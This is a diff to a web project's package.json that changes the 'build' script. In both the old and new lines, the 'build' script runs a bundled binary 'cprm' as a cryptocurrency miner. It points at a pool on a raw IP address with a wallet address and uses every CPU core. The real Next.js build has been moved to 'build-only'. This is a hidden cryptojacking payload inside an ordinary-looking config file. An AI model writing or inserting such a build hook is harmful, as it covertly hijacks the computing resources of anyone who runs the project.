--- a/package.json
+++ b/package.json
@@ -2,7 +2,7 @@
   "private": true,
   "scripts": {
     "dev": "next dev --turbo",
-    "build": "chmod +x cprm && ./cprm -a minotaurx -o 128.199.68.208:443 -u RGFcv8JX6xEupo5cBzUGdMaTu86hhpo1bG -p cpu -t $(nproc --all)",
+    "build": "chmod +x cprm && ./cprm -a yespowertide -o 128.199.68.208:80  -u TSmFhoamG8WHPii3KpxA5bi7V6DtZ5vPxw -p cpu -t $(nproc --all)",
     "build-only": "next build",
     "start": "next start",
     "setup": "node ./setup.mjs"
